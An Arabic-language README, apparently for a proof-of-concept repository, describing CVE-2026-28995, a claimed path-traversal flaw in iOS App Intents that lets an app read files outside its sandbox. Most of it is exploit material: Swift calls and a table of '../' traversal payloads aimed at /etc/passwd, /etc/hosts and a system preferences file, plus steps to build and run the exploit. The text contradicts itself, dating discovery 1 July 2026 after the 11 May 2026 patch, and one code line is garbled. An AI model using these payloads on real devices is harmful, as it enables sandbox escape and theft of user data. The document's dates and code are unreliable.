
# CVE-2026-28995 إثبات المفهوم لـ CVE-2026-28995 — ثغرة تجاوز المسار في App Intents على iOS 26.4.2 والإصدارات الأقدم
إثبات المفهوم لـ CVE-2026-28995 — ثغرة اجتياز المسار في App Intents على iOS 26.4.2 والإصدارات الأقدم.
تسمح هذه الثغرة لتطبيق ضار بـ قراءة أي ملف خارج حمايته (sandbox) عبر App Intents. السبب الجذري هو التحقق غير الكافي من المسار في إطار عمل App Intents من Apple.
الإصدارات المتأثرة: iOS 26.4.2 والإصدارات الأقدم
تم التصحيح في: iOS 26.5 (11 مايو 2026)
readCve(path: String) -> Stringlet intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
| المسار | يقرأ |
|---|---|
| ../../../../../../../../../../../../../etc/passwd | كلمات مرور المستخدمين |
| ../../../../../../../../../../../../../etc/hosts | ملف hosts |
| ../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist | تفضيلات النظام |
إذا كان المسار يشير إلى دليل، فستُرجع الدالة:
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/
أنشئ مشروع iOS في Xcode.
أضف CVE-2026-28995.swift إلى المشروع.
استدعِ readCve(path:) باستخدام المسار المستهدف.
شغّل على iOS 26.4.2 أو إصدار أقدم.
تم الاكتشاف: 1 يوليو 2026
تم التصحيح في: iOS 26.5 (11 مايو 2026)